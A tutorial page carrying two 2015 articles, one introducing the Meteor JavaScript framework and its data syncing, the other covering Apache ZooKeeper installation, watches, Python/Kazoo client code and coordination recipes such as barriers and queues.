How-To Tutorials


05 Feb 2015

9 min read

Building the next generation Web with Meteor


This article by Fabian Vogelsteller, the author of Building Single-page Web Apps with Meteor, explores the full-stack framework of Meteor.

Meteor is not just a JavaScript library such as jQuery or AngularJS. It's a full-stack solution that contains frontend libraries, a Node.js-based server, and a command-line tool. Together, these let us write large-scale web applications in JavaScript, on both the server and the client, using a consistent API.

Even though Meteor is quite young, a few companies such as https://lookback.io, https://respond.ly, and https://madeye.io already use it in their production environments. If you want to see for yourself what's made with Meteor, take a look at http://madewith.meteor.com.

Meteor makes it easy for us to build web applications quickly and takes care of the boring processes such as file linking, minifying, and concatenating of files.

Here are a few highlights of what is possible with Meteor:

- We can build complex web applications amazingly fast using templates that automatically update themselves when data changes
- We can push new code to all clients on the fly while they are using our app
- Meteor core packages come with a complete account solution, allowing a seamless integration with Facebook, Twitter, and more
- Data will automatically be synced across clients, keeping every client in the same state in almost real time
- Latency compensation will make our interface appear super fast while the server response happens in the background

With Meteor, we never have to link files with the <script> tags in HTML. Meteor's command-line tool automatically collects JavaScript or CSS files in our application's folder and links them in the index.html file, which is served to clients on initial page load. This makes structuring our code in separate files as easy as creating them.
Meteor's command-line tool also watches all files inside our application's folder for changes and rebuilds them on the fly when they change. Additionally, it starts a Meteor server that serves the app's files to the clients. When a file changes, Meteor reloads the site of every client while preserving its state. This is called a hot code reload.

In production, the build process also concatenates and minifies our CSS and JavaScript files. By simply adding the less and coffee core packages, we can even write all styles in LESS and code in CoffeeScript with no extra effort.

The command-line tool is also the tool for deploying and bundling our app so that we can run it on a remote server.

Sounds awesome? Let's take a look at what's needed to use Meteor.

Adding basic packages

Packages in Meteor are libraries that can be added to our projects. The nice thing about Meteor packages is that they are self-contained units, which run out of the box. They mostly add either some templating functionality or provide extra objects in the global namespace of our project.

Packages can also add features to Meteor's build process, like the stylus package, which lets us write our app's style files with the stylus pre-processor syntax.

Writing templates in Meteor

Normally, when we build websites, we build the complete HTML on the server side. This is quite straightforward: every page is built on the server, then it is sent to the client, and finally JavaScript adds some animation or dynamic behavior to it.

This is not so in single-page apps, where each page needs to be in the client's browser already so that it can be shown at will. Meteor solves that problem by providing templates that exist in JavaScript and can be placed in the DOM at some point. These templates can have nested templates, allowing for an easy way to reuse and structure an app's HTML layout.
Since Meteor is so flexible in terms of folder and file structure, any *.html page can contain a template and will be parsed during Meteor's build process. This allows us to put all templates in the my-meteor-blog/client/templates folder. This folder structure is chosen because it helps us organize templates as our app grows.

Meteor's template engine is called Spacebars, which is a derivative of the handlebars template engine. Spacebars is built on top of Blaze, which is Meteor's reactive DOM update engine.

Meteor and databases

Meteor currently uses MongoDB by default to store data on the server, although there are drivers planned for relational databases, too.

If you are adventurous, you can try one of the community-built SQL drivers, such as the numtel:mysql package from https://atmospherejs.com/numtel/mysql.

MongoDB is a NoSQL database. This means it is based on a flat document structure instead of a relational table structure. Its document approach makes it ideal for JavaScript, as documents are stored in BSON, which is very similar to the JSON format.

Meteor has a database everywhere approach, which means we have the same API to query the database on the client as well as on the server. Yet, when we query the database on the client, we are only able to access data that we published to that client.

MongoDB uses a data structure called a collection, which is the equivalent of a table in an SQL database. Collections contain documents, where each document has its own unique ID. These documents are JSON-like structures and can contain properties with values, even with multiple dimensions:

    {
      "_id": "W7sBzpBbov48rR7jW",
      "myName": "My Document Name",
      "someProperty": 123456,
      "aNestedProperty": {
        "anotherOne": "With another string"
      }
    }

These collections are used to store data in the server's MongoDB as well as in the client-side minimongo collections. Minimongo is an in-memory database mimicking the behavior of the real MongoDB.
The MongoDB API lets us use a simple JSON-based query language to get documents from a collection. We can pass additional options to ask only for specific fields or to sort the returned documents. These are very powerful features, especially on the client side, to display data in various ways.

Data everywhere

In Meteor, we can use the browser console to update data, which means we update the database from the client. This works because Meteor automatically syncs these changes to the server and updates the database accordingly.

This happens because the autopublish and insecure core packages are added to our project by default. The autopublish package automatically publishes all documents to every client, whereas the insecure package allows every client to update database records by their _id field. Obviously, this works well for prototyping but is infeasible for production, as every client could manipulate our database.

If we remove the insecure package, we need to add "allow and deny" rules to determine what a client is allowed to update and what not; otherwise, all updates will be denied.

Differences between client and server collections

Meteor has a database everywhere approach. This means it provides the same API on the client as on the server. The data flow is controlled using a publication/subscription model.

On the server sits the real MongoDB database, which stores data persistently. On the client, Meteor has a package called minimongo, which is a pure in-memory database mimicking most of MongoDB's query and update functions.

Every time a client connects to its Meteor server, Meteor downloads the documents the client subscribed to and stores them in its local minimongo database. From here, they can be displayed in a template or processed by functions.

When the client updates a document, Meteor syncs it back to the server, where it is passed through any allow/deny functions before being persistently stored in the database.
This also works the other way around: when a document in the server-side database changes, it is automatically synced to every client that is subscribed to it, keeping every connected client up to date.

Syncing data: the current Web versus the new Web

In the current Web, most pages are either static files hosted on a server or dynamically generated by a server on request. This is true for most server-side-rendered websites, for example, those written with PHP, Rails, or Django. In both cases, the client does little more than display what it receives; such clients are therefore called thin clients.

In modern web applications, the idea of the browser has moved from thin clients to fat clients. This means most of the website's logic resides on the client, and the client asks for the data it needs.

Currently, this is mostly done via calls to an API server. This API server then returns data, commonly in JSON form, giving the client an easy way to handle it and use it appropriately.

Most modern websites are a mixture of thin and fat clients. Normal pages are server-side-rendered, and only some functionality, such as a chat box or news feed, is updated using API calls.

Meteor, however, is built on the idea that it's better to use the calculation power of all clients instead of one single server. A pure fat client or a single-page app contains the entire logic of a website's frontend, which is sent down on the initial page load.

The server then merely acts as a data source, sending only the data to the clients. This can happen by connecting to an API and utilizing AJAX calls or, as with Meteor, by using a model called publication/subscription. In this model, the server offers a range of publications, and each client decides which dataset it wants to subscribe to.

Compared with AJAX calls, the developer doesn't have to take care of any downloading or uploading logic.
The Meteor client syncs all of the data automatically in the background as soon as it subscribes to a specific dataset. When data on the server changes, the server sends the updated documents to the clients, and vice versa.

Summary

Meteor comes with more great ways of building pure JavaScript applications, such as simple routing and simple ways to make components that can be packaged for others to use.

Meteor's reactivity model, which allows you to rerun any function and template helper at will, allows for consistent interfaces and simple dependency tracking, which is key for large-scale JavaScript applications.

If you want to dig deeper, the book Building Single-page Web Apps with Meteor shows how to build your own blog as a single-page web application in a simple step-by-step fashion.


Packt

05 Feb 2015

26 min read

Introduction to Apache ZooKeeper


In this article by Saurav Haloi, author of the book Apache ZooKeeper Essentials, we will learn about Apache ZooKeeper. ZooKeeper is a software project of the Apache Software Foundation; it provides an open source solution to the various coordination problems in large distributed systems. As a centralized coordination service, ZooKeeper is distributed and highly reliable, running on a cluster of servers called a ZooKeeper ensemble. Distributed consensus, group management, presence protocols, and leader election are implemented by the service so that applications do not need to reinvent the wheel by implementing them on their own. On top of these, the primitives exposed by ZooKeeper can be used by applications to build much more powerful abstractions for solving a wide variety of problems.

Apache ZooKeeper is implemented in Java. It ships with C, Java, Perl, and Python client bindings. Community-contributed client libraries are available for a plethora of languages such as Go, Scala, Erlang, and so on.

Apache ZooKeeper is widely used as a coordination service by a large number of organizations, such as Yahoo Inc., Twitter, Netflix, and Facebook, in their distributed application platforms.

In this article, we will look into the installation and configuration of Apache ZooKeeper and some of the concepts associated with it, followed by programming with a Python client library for ZooKeeper. We will also see how to implement some of the important constructs of distributed programming using ZooKeeper.

Download and installation

ZooKeeper runs on a wide variety of platforms. GNU/Linux and Oracle Solaris are supported as development and production platforms for both server and client. Windows and Mac OS X are recommended only as development platforms for both server and client.

ZooKeeper is implemented in Java and requires Java 6 or later versions to run.
Let's download the stable version from one of the mirrors, say Georgia Tech's Apache download mirror (http://b.gatech.edu/1xElxRb), in the following example:

    $ wget http://www.gtlib.gatech.edu/pub/apache/zookeeper/stable/zookeeper-3.4.6.tar.gz
    $ ls -alh zookeeper-3.4.6.tar.gz
    -rw-rw-r-- 1 saurav saurav 17M Feb 20 2014 zookeeper-3.4.6.tar.gz

Once we have downloaded the ZooKeeper tarball, installing and setting up a standalone ZooKeeper node is pretty simple and straightforward. Let's extract the compressed tar archive into /usr/share:

    $ tar -C /usr/share -zxf zookeeper-3.4.6.tar.gz
    $ cd /usr/share/zookeeper-3.4.6/
    $ ls
    bin CHANGES.txt contrib docs ivy.xml LICENSE.txt
    README_packaging.txt recipes zookeeper-3.4.6.jar zookeeper-3.4.6.jar.md5
    build.xml conf dist-maven ivysettings.xml lib
    NOTICE.txt README.txt src zookeeper-3.4.6.jar.asc
    zookeeper-3.4.6.jar.sha1

The location where the ZooKeeper archive is extracted, in our case /usr/share/zookeeper-3.4.6, can be exported as ZK_HOME as follows:

    $ export ZK_HOME=/usr/share/zookeeper-3.4.6

Configuration

Once we have extracted the tarball, the next thing is to configure ZooKeeper. The conf folder holds the configuration files for ZooKeeper. ZooKeeper needs a configuration file called zoo.cfg in the conf folder inside the extracted ZooKeeper folder. There is a sample configuration file that contains some of the configuration parameters for reference.

Let's create our configuration file with the following minimal parameters and save it in the conf directory:

    $ cat conf/zoo.cfg
    tickTime=2000
    dataDir=/var/lib/zookeeper
    clientPort=2181

The configuration parameters' meanings are explained here:

- tickTime: This is measured in milliseconds; it is used for session registration and for regular heartbeats by clients with the ZooKeeper service. The minimum session timeout will be twice the tickTime parameter.
- dataDir: This is the location where ZooKeeper stores its in-memory state; it includes database snapshots and the transaction log of updates to the database. Extracting the ZooKeeper archive won't create this directory, so if this directory doesn't exist in the system, you will need to create it and make it writable.
- clientPort: This is the port that listens for client connections, so it is where the ZooKeeper clients will initiate a connection. The client port can be set to any number, and different servers can be configured to listen on different ports. The default is 2181.

ZooKeeper needs the JAVA_HOME environment variable to be set correctly. To see if this is set in your system, run the following command:

    $ echo $JAVA_HOME

Starting the ZooKeeper server

Now, considering that Java is installed and working properly, let's go ahead and start the ZooKeeper server. All ZooKeeper administration scripts to start/stop the server and invoke the ZooKeeper command shell are shipped along with the archive in the bin folder, as shown here:

    $ pwd
    /usr/share/zookeeper-3.4.6/bin
    $ ls
    README.txt zkCleanup.sh zkCli.cmd zkCli.sh zkEnv.cmd zkEnv.sh zkServer.cmd zkServer.sh

The scripts with the .sh extension are for Unix platforms (GNU/Linux, Mac OS X, and so on), and the scripts with the .cmd extension are for Microsoft Windows operating systems.

To start the ZooKeeper server in a GNU/Linux system, you need to execute the zkServer.sh script.
This script gives options to start, stop, restart, and see the status of the ZooKeeper server:

    $ ./zkServer.sh
    JMX enabled by default
    Using config: /usr/share/zookeeper-3.4.6/bin/../conf/zoo.cfg
    Usage: ./zkServer.sh {start|start-foreground|stop|restart|status|upgrade|print-cmd}

To avoid going to the ZooKeeper install directory to run these scripts, you can include it in your PATH variable as follows:

    export PATH=$PATH:/usr/share/zookeeper-3.4.6/bin

Executing zkServer.sh with the start argument will start the ZooKeeper server. A successful start of the server will show the following output:

    $ zkServer.sh start
    JMX enabled by default
    Using config: /usr/share/zookeeper-3.4.6/bin/../conf/zoo.cfg
    Starting zookeeper ... STARTED

To verify that the ZooKeeper server has started, you can use the following ps command:

    $ ps -ef | grep zookeeper | grep -v grep | awk '{print $2}'
    5511

The ZooKeeper server's status can be checked with the zkServer.sh script as follows:

    $ zkServer.sh status
    JMX enabled by default
    Using config: /usr/share/zookeeper-3.4.6/bin/../conf/zoo.cfg
    Mode: standalone

Connecting to ZooKeeper with a Java-based shell

To start the Java-based ZooKeeper command-line shell, we simply need to run zkCli.sh from the ZK_HOME/bin folder with the server IP and port as follows:

    ${ZK_HOME}/bin/zkCli.sh -server zk_server:port

In our case, we are running our ZooKeeper server on the same machine, so the ZooKeeper server will be localhost, or the loopback address 127.0.0.1. The port we configured was the default, 2181:

    $ zkCli.sh -server localhost:2181

As we connect to the running ZooKeeper instance, we will see output similar to the following in the terminal (some output is omitted):

    Connecting to localhost:2181
    ...............
    ...............
    Welcome to ZooKeeper!
    JLine support is enabled
    .............
    WATCHER::
    WatchedEvent state:SyncConnected type:None path:null
    [zk: localhost:2181(CONNECTED) 0]

To see a listing of the commands supported by the ZooKeeper Java shell, you can run the help command in the shell prompt:

    [zk: localhost:2181(CONNECTED) 0] help
    ZooKeeper -server host:port cmd args
        connect host:port
        get path [watch]
        ls path [watch]
        set path data [version]
        rmr path
        delquota [-n|-b] path
        quit
        printwatches on|off
        create [-s] [-e] path data acl
        stat path [watch]
        close
        ls2 path [watch]
        history
        listquota path
        setAcl path acl
        getAcl path
        sync path
        redo cmdno
        addauth scheme auth
        delete path [version]
        setquota -n|-b val path

We can execute a few simple commands to get a feel of the command-line interface. Let's start by running the ls command, which, as in Unix, is used for listing:

    [zk: localhost:2181(CONNECTED) 1] ls /
    [zookeeper]

Here, the ls command returned a string called zookeeper, which is a znode in ZooKeeper terminology. We can create a znode through the ZooKeeper shell as follows.

To begin with, let's create a HelloWorld znode with empty data:

    [zk: localhost:2181(CONNECTED) 2] create /HelloWorld ""
    Created /HelloWorld
    [zk: localhost:2181(CONNECTED) 3] ls /
    [zookeeper, HelloWorld]

We can delete the znode we created by issuing the delete command as follows:

    [zk: localhost:2181(CONNECTED) 4] delete /HelloWorld
    [zk: localhost:2181(CONNECTED) 5] ls /
    [zookeeper]

The ZooKeeper data model

ZooKeeper allows distributed processes to coordinate with each other through a shared hierarchical namespace of data registers. The namespace looks quite similar to a Unix filesystem. The data registers are known as znodes in the ZooKeeper nomenclature.

ZooKeeper has two types of znodes: persistent and ephemeral. There is a third type that you might have heard of, called a sequential znode, which is a kind of qualifier for the other two types. Both persistent and ephemeral znodes can be sequential znodes as well.
The persistent znode

As the name suggests, persistent znodes live in ZooKeeper's namespace until they're explicitly deleted. A znode can be deleted by calling the delete API call.

The ephemeral znode

An ephemeral znode is deleted by the ZooKeeper service when the creating client's session ends. A client's session can end because of a disconnection due to a client crash or because of an explicit termination of the connection.

The sequential znode

A sequential znode is assigned a sequence number by ZooKeeper as a part of its name during its creation. The value of a monotonically increasing counter (maintained by the parent znode) is appended to the name of the znode.

The ZooKeeper Watches

ZooKeeper is designed to be a scalable and robust centralized service for very large distributed applications. A common design anti-pattern when clients access such services is polling, or a pull kind of model. A pull model often suffers from scalability problems when implemented in large and complex distributed systems. To solve this problem, the ZooKeeper designers implemented a mechanism where clients can get notifications from the ZooKeeper service instead of polling for events. This resembles a push model, where notifications are pushed to the registered clients of the ZooKeeper service.

Clients can register with the ZooKeeper service for any changes associated with a znode. This registration is known as setting a watch on a znode in ZooKeeper terminology. Watches allow clients to get notifications when a znode changes in any way.

A watch is a one-time trigger, which means that it produces only one notification. If a client receives a watch event and wants to be notified of future changes, it must set another watch upon receiving each event notification.
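The one-time nature of watches can be illustrated with a small in-memory model. This is only a sketch: the OneShotWatchNode class below is a hypothetical stand-in written for this example and is not part of ZooKeeper or of any client library. It compares a watcher that is set once with a watcher that re-registers itself inside its own callback.

```python
class OneShotWatchNode:
    """In-memory stand-in for a znode with one-time data watches.

    Hypothetical helper for illustration; not a ZooKeeper API.
    """

    def __init__(self, data=b""):
        self.data = data
        self._watchers = []

    def get(self, watch=None):
        """Return the data and, optionally, register a one-time watch."""
        if watch is not None:
            self._watchers.append(watch)
        return self.data

    def set(self, data):
        """Update the data and fire every registered watch exactly once."""
        self.data = data
        fired, self._watchers = self._watchers, []  # watches are consumed
        for callback in fired:
            callback("NodeDataChanged")


node = OneShotWatchNode(b"v0")

# Watcher 1: set once and never re-registered.
once_events = []
node.get(watch=once_events.append)

# Watcher 2: re-registers itself every time it is notified.
seen_values = []

def rewatch(event):
    # Reading the data again with watch=rewatch sets the next watch.
    seen_values.append(node.get(watch=rewatch))

node.get(watch=rewatch)

node.set(b"v1")
node.set(b"v2")

print(once_events)  # only the first change was delivered
print(seen_values)  # both changes were observed
```

With a real client, the same pattern would apply to calls such as Kazoo's get(path, watch=callback), where the callback would have to issue the read again to keep watching.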
Whenever a watch is triggered, a notification is dispatched to the client that had set the watch. Watches are maintained in the ZooKeeper server to which a client is connected, and this makes them a fast and lean means of event notification.

The watches are triggered for the following three changes to a znode:

- Any changes to the data of a znode, such as when new data is written to the znode's data field using the setData operation.
- Any changes to the children of a znode. For instance, children of a znode are deleted with the delete operation.
- A znode being created or deleted, which could happen in the event that a new znode is added to a path or an existing one is deleted.

ZooKeeper asserts the following guarantees with respect to watches and notifications:

- ZooKeeper ensures that watches are always ordered in the FIFO manner and that notifications are always dispatched in order
- Watch notifications are delivered to a client before any other change is made to the same znode
- Watch events are ordered with respect to the updates seen by the ZooKeeper service

ZooKeeper operations

ZooKeeper's data model and its API support nine basic operations: create, delete, exists, getChildren, getData, setData, getACL, setACL, and sync.

Watches and ZooKeeper operations

The read operations on znodes, such as exists, getChildren, and getData, allow watches to be set on them. The watches, in turn, are triggered by the write operations on znodes, such as create, delete, and setData. ACL operations do not participate in watches.

The following table lists the actions that generate an event for a watch set through each read operation:

    Operation      Event-generating actions
    exists         A znode is created or deleted, or its data is updated
    getChildren    A child of a znode is created or deleted, or the znode itself is deleted
    getData        A znode is deleted or its data is updated
The following are the types of watch events that might occur during a znode state change:

- NodeChildrenChanged: A znode's child is created or deleted
- NodeCreated: A znode is created in a ZooKeeper path
- NodeDataChanged: The data associated with a znode is updated
- NodeDeleted: A znode is deleted in a ZooKeeper path

Programming Apache ZooKeeper with Python

ZooKeeper is easily programmable and has client bindings for a plethora of languages. It ships with official Java, C, Perl, and Python client libraries. Here, we will look at programming ZooKeeper with Python.

The official client binding for Python is developed on top of the C bindings. It can be found in the contrib/zkpython directory of the ZooKeeper distribution. To build and install the Python binding, refer to the instructions in the README file there.

In this section, we will look at another popular Python client library for ZooKeeper, called Kazoo (https://kazoo.readthedocs.org/).

Kazoo is a pure Python library for ZooKeeper, which means that unlike the official Python bindings, Kazoo is implemented fully in Python and has no dependency on the C bindings of ZooKeeper. Along with providing both synchronous and asynchronous APIs, the Kazoo library also provides APIs for some distributed data structure primitives such as distributed locks, leader election, distributed queues, and so on.

Installation of Kazoo is very simple and can be done with either the pip or the easy_install installer.

Using pip, Kazoo can be installed with the following command:

    $ pip install kazoo

Using easy_install, Kazoo is installed as follows:

    $ easy_install kazoo

To verify whether Kazoo is installed properly, let's try to connect to the ZooKeeper instance and print the list of znodes in the root path of the tree.

To do this, we import KazooClient, which is the main ZooKeeper client class. Then, we create an object of the class (an instance of KazooClient) by connecting to the ZooKeeper instance that is running on localhost. Calling the start() method initiates a connection to the ZooKeeper server. Once successfully connected, the instance contains the handle to the ZooKeeper session. When we then call the get_children() method on the root path of the ZooKeeper namespace, it returns a list of the children. Finally, we close the connection by calling the stop() method.

A watcher implementation

Kazoo provides higher-level child and data watching APIs as a recipe through a module called kazoo.recipe.watchers. This module provides the implementation of DataWatch and ChildrenWatch along with another class called PatientChildrenWatch. The PatientChildrenWatch class returns values after the children of a node haven't changed for a period of time, unlike the other two, which return each time an event is generated.

Let's look at the implementation of a simple children watcher client, which will generate an event each time a znode is added to or deleted from the ZooKeeper path:

    import signal

    from kazoo.client import KazooClient

    zoo_path = '/MyPath'

    # Connect to the ZooKeeper server running on localhost
    zk = KazooClient(hosts='localhost:2181')
    zk.start()

    # Create the path if it does not exist yet
    zk.ensure_path(zoo_path)

    # Called with the current list of children on every change
    @zk.ChildrenWatch(zoo_path)
    def child_watch_func(children):
        print("List of Children %s" % children)

    # Keep the process alive while waiting for events
    while True:
        signal.pause()

In this simple implementation of a children watcher, we connect to the ZooKeeper server that is running on localhost and create the path /MyPath with zk.ensure_path(zoo_path). We then set a children watcher on this path with the @zk.ChildrenWatch(zoo_path) decorator and register a callback method, child_watch_func, which prints the current list of children whenever an event is generated in /MyPath.
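The connectivity check described earlier in this section (create a KazooClient, call start(), list the children of the root path, and call stop()) can be sketched as follows. The helper names list_root_children and make_client are made up for this example, and the host string assumes a ZooKeeper server listening on localhost:2181. Kazoo is imported lazily inside make_client so that the file can be loaded even where Kazoo is not installed.

```python
def list_root_children(zk):
    """Connect, list the children of the root path, and disconnect.

    `zk` is expected to behave like a KazooClient, that is, to offer
    start(), get_children(path), and stop().
    """
    zk.start()
    try:
        return zk.get_children('/')
    finally:
        # Always close the session, even if the listing fails.
        zk.stop()


def make_client(hosts='localhost:2181'):
    """Build a KazooClient for the given host string (assumed default)."""
    from kazoo.client import KazooClient  # imported only when needed
    return KazooClient(hosts=hosts)


# With a ZooKeeper server running locally, the check would be:
#     print(list_root_children(make_client()))
```

On a freshly started standalone server, the returned list would be expected to contain the zookeeper znode seen earlier in the shell session.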
When we run this client watcher in a terminal, it starts listening to events. In another terminal, we create some znodes in /MyPath with the ZooKeeper shell. We observe that the children watcher client receives these znode creation events and prints the list of the current children in the terminal window. Similarly, if we delete the znodes that we just created, the watcher receives the events and prints the children listing in the terminal where it is running.

ZooKeeper recipes

In this section, you will learn to develop high-level distributed system constructs and data structures using ZooKeeper. As mentioned earlier, most of these constructs and functions are of utmost importance in building scalable distributed architectures, but they are fairly complicated to implement from scratch. Developers can often get bogged down while implementing these and integrating them with their application logic. In this section, you will learn how to develop algorithms to build some of these high-level functions using ZooKeeper primitives and its data model and see how ZooKeeper makes this simple, scalable, and error free, with much less code.

Barrier

A barrier is a type of synchronization method used in distributed systems to block the processing of a set of nodes until a condition is satisfied. It defines a point where all nodes must stop their processing and cannot proceed until all the other nodes reach this barrier.

The algorithm to implement a barrier using ZooKeeper is as follows:

1. To start with, a znode is designated to be a barrier znode, say /zk_barrier.
2. The barrier is said to be active in the system if this barrier znode exists.
3. Each client calls the ZooKeeper API's exists() function on /zk_barrier and registers for watch events on the barrier znode (the watch event is set to true).
4. If the exists() method returns false, the barrier no longer exists, and the client proceeds with its computation.
5. Else, if the exists() method returns true, the client just waits for watch events.
6. Whenever the barrier exit condition is met, the client in charge of the barrier will delete /zk_barrier.
7. The deletion triggers a watch event, and on getting this notification, the client calls the exists() function on /zk_barrier again.
8. This time, the exists() call in step 7 returns false, and the clients can proceed further.

The barrier exists until the barrier znode ceases to exist! In this way, we can implement a barrier using ZooKeeper without much effort.

The example cited so far is a simple barrier that makes a group of distributed processes wait on some condition and then proceed together when the condition is met. There is another type of barrier that aids in synchronizing the beginning and end of a computation; this is known as a double barrier. The logic of a double barrier states that a computation is started when the required number of processes join the barrier. The processes leave after completing the computation, and when the number of processes participating in the barrier becomes zero, the computation is considered to have ended.

The algorithm for a double barrier is implemented by having a barrier znode that serves as the parent for the individual process znodes participating in the computation. The algorithm is outlined as follows.

Phase 1: Joining the barrier can be done as follows:

1. Suppose the barrier znode is represented by the znode /barrier.
2. Every client process registers with the barrier znode by creating an ephemeral znode with /barrier as the parent. In real scenarios, clients might register using their hostnames.
3. The client process sets a watch event for the existence of another znode called ready under the /barrier znode and waits for the node to appear.
4. A number N is predefined in the system; this governs the minimum number of clients to join the barrier before the computation can start. While joining the barrier, each client process finds the number of child znodes of /barrier:

       M = getChildren(/barrier, watch=false)

5. If M is less than N, the client waits for the watch event registered in step 3. Else, if M is equal to N, the client process creates the ready znode under /barrier.
6. The creation of the ready znode in step 5 triggers the watch event, and each client starts the computation that it was waiting to do.

Phase 2: Leaving the barrier can be done as follows:

1. On finishing the computation, the client process deletes the znode it created under /barrier (in step 2 of Phase 1: Joining the barrier).
2. The client process then finds the number of children under /barrier:

       M = getChildren(/barrier, watch=True)

   If M is not equal to 0, this client waits for notifications (observe that we have set the watch event to True in the preceding call). If M is equal to 0, the client exits the barrier znode.

The preceding procedure suffers from a potential herd effect, where all client processes wake up to check the number of children left in the barrier when a notification is triggered. To avoid this, we can create a sequential ephemeral znode in step 2 of Phase 1: Joining the barrier. Every client process then watches for its next lowest sequential ephemeral znode to go away as an exit criterion. This way, only a single event is generated for any client completing the computation, and hence, not all clients need to wake up together to check on their exit condition. For a large number of client processes participating in a barrier, the herd effect can negatively impact the scalability of the ZooKeeper service, and developers should be aware of such scenarios.
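As a rough illustration of the simple (single) barrier algorithm described at the start of this section, the following sketch runs three worker threads against a tiny in-memory stand-in for ZooKeeper. The InMemoryZk class and the wait_on_barrier function are hypothetical names written for this example; only the exists-with-watch and delete steps of the algorithm are modeled, and the stand-in does not reproduce sessions, errors, or any other ZooKeeper behavior.

```python
import threading


class InMemoryZk:
    """Tiny in-memory stand-in for a ZooKeeper client (illustration only)."""

    def __init__(self):
        self._lock = threading.Lock()
        self._nodes = set()
        self._watches = {}  # path -> callbacks waiting for a change

    def create(self, path):
        with self._lock:
            self._nodes.add(path)

    def exists(self, path, watch=None):
        with self._lock:
            if watch is not None:
                self._watches.setdefault(path, []).append(watch)
            return path in self._nodes

    def delete(self, path):
        with self._lock:
            self._nodes.discard(path)
            fired = self._watches.pop(path, [])  # one-time watches
        for callback in fired:
            callback("NodeDeleted")


def wait_on_barrier(zk, path="/zk_barrier"):
    """Block the caller until the barrier znode no longer exists."""
    while True:
        changed = threading.Event()
        if not zk.exists(path, watch=lambda event: changed.set()):
            return          # barrier is gone: proceed with the computation
        changed.wait()      # sleep until the watch fires, then check again


zk = InMemoryZk()
zk.create("/zk_barrier")    # the barrier is now active

passed = []

def worker(name):
    wait_on_barrier(zk)
    passed.append(name)

threads = [threading.Thread(target=worker, args=(i,)) for i in range(3)]
for t in threads:
    t.start()

blocked_before = list(passed)   # nobody can pass while the znode exists
zk.delete("/zk_barrier")        # exit condition met: remove the barrier
for t in threads:
    t.join(timeout=5)

print(blocked_before, sorted(passed))
```

The loop in wait_on_barrier re-checks exists() after every notification instead of trusting the event alone, which mirrors steps 3 to 8 of the algorithm. For real applications, Kazoo also provides barrier recipes in its kazoo.recipe.barrier module, which are likely a better starting point than a hand-written loop.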
A Java language implementation of a double barrier can be found in the ZooKeeper documentation at http://zookeeper.apache.org/doc/r3.4.6/zookeeperTutorial.html.

Queue

A distributed queue is a very common data structure used in distributed systems. A special implementation of a queue, called a producer-consumer queue, is where a collection of processes called producers generate or create new items and put them in the queue, while consumer processes remove the items from the queue and process them. The addition and removal of items in the queue follow a strict first in, first out (FIFO) ordering.

A producer-consumer queue can be implemented using ZooKeeper. A znode will be designated to hold a queue instance, say queue-znode. All queue items are stored as znodes under this znode. Producers add an item to the queue by creating a znode under the queue-znode, and consumers retrieve the items by getting and then deleting a child from the queue-znode.

The FIFO order of the items is maintained using the sequential property of znodes provided by ZooKeeper. When a producer process creates a znode for a queue item, it sets the sequential flag. This lets ZooKeeper append a monotonically increasing sequence number to the znode name as a suffix. ZooKeeper guarantees that the sequence numbers are applied in order and are not reused. The consumer process processes the items in the correct order by looking at the sequence number of the znode.

The pseudocode for the algorithm to implement a producer-consumer queue using ZooKeeper is shown here:

1. Let /_QUEUE_ represent the top-level znode for our queue implementation, which is also called the queue-node.
2. Clients acting as producer processes put something into the queue by calling the create() method with the znode name "queue-" and with the sequence and ephemeral flags set: create("queue-", SEQUENCE_EPHEMERAL). The sequence flag lets the new znode get a name like queue-N, where N is a monotonically increasing number.
3. Clients acting as consumer processes issue a getChildren() method call on the queue-node with a watch event set to true: M = getChildren(/_QUEUE_, true). The consumer sorts the children list M, takes out the lowest numbered child znode from the list, starts processing it by taking out the data from the znode, and then deletes it.
4. The client picks up items from the list and continues processing them. On reaching the end of the list, the client should check again whether any new items have been added to the queue by issuing another getChildren() method call.
5. The algorithm continues until getChildren() returns an empty list; this means that no more znodes or items are left under /_QUEUE_.

It's quite possible that in step 3, the deletion of a znode by a client will fail because some other client has gained access to the znode while this client was retrieving the item. In such scenarios, the client should retry the delete call.

Using this algorithm for the implementation of a generic queue, we can also build a priority queue out of it, where each item can have a priority tagged to it. The algorithm and implementation are left as an exercise for the reader.

C and Java implementations of the distributed queue recipe are shipped along with the ZooKeeper distribution under the recipes folder. Developers can use this recipe to implement distributed queues in their applications. Kazoo, the Python client library for ZooKeeper, has distributed queue implementations inside the kazoo.recipe.queue module. This queue implementation has built-in support for assigning priorities to queue items as well as for queue locking.
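The ordering logic of the queue recipe can be illustrated with a small in-memory sketch. ToyQueueNode below is a hypothetical stand-in for /_QUEUE_ and is not part of ZooKeeper or Kazoo; it only mimics sequential naming with a zero-padded ten-digit suffix, and it deliberately returns children in an unhelpful order to show why the consumer has to sort them.

```python
class ToyQueueNode:
    """Hypothetical in-memory stand-in for the /_QUEUE_ znode."""

    def __init__(self):
        self._next_seq = 0
        self.items = {}  # child znode name -> item data

    def create_sequential(self, prefix, data):
        # Mimic the sequential flag: append a zero-padded, increasing counter.
        name = "%s%010d" % (prefix, self._next_seq)
        self._next_seq += 1
        self.items[name] = data
        return name

    def get_children(self):
        # Returned in reverse on purpose: callers must not rely on any order.
        return sorted(self.items, reverse=True)

    def delete(self, name):
        # False means another consumer already removed this item.
        return self.items.pop(name, None) is not None


def sequence_of(name):
    """Extract the numeric suffix from a name such as queue-0000000007."""
    return int(name.rsplit("-", 1)[1])


def consume_all(queue):
    """Drain the queue in FIFO order and return the processed items."""
    processed = []
    while True:
        children = sorted(queue.get_children(), key=sequence_of)
        if not children:
            return processed            # empty list: nothing left to do
        for name in children:
            if name in queue.items:
                data = queue.items[name]
                if queue.delete(name):  # only the deleter processes the item
                    processed.append(data)


queue = ToyQueueNode()
first_name = queue.create_sequential("queue-", "a")
queue.create_sequential("queue-", "b")
queue.create_sequential("queue-", "c")
drained = consume_all(queue)
```

Sorting by the numeric suffix, rather than trusting the order in which children are listed, is what preserves the FIFO guarantee in this sketch.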
Lock

A lock in a distributed system is an important primitive that provides applications with a means to synchronize their access to shared resources. Distributed locks need to be globally synchronous to ensure that no two clients can hold the same lock at any instant of time.

Typical scenarios where locks are unavoidable are when the system as a whole needs to ensure that only one node of the cluster is allowed to carry out an operation at a given time, such as writing to a shared database or file, acting as a decision subsystem, or processing all I/O requests from other nodes.

ZooKeeper can be used to implement mutually exclusive locks for processes that run on different servers across different networks and even geographically apart.

